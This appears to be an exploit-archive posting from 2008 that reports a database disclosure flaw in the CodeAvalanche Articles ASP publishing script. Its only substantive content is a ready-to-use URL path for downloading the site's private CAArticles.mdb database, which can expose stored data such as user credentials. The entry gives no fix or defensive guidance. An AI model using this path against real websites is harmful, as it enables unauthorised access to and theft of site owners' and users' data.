id: 4460
date: 12/15/2008
title: CodeAvalanche Articles (CAArticles.mdb) Database Disclosure Vuln
author: Pouya_Server
cves: 

================================================================
CodeAvalanche Articles (CAArticles.mdb) Database Disclosure Vuln
================================================================


#########################################################
---------------------------------------------------------
Portal Name: CAArticles
Download : http://www.truecontent.info/codeavalanche/asp-articles-publishing-script.php
Author : Pouya_Server 
Vulnerability : (DD)
---------------------------------------------------------
#########################################################
[DD]:
http://site.com/[Path]/CAArticles/_private/CAArticles.mdb
 
---------------------------------



#  0day.today [2023-03-27]  #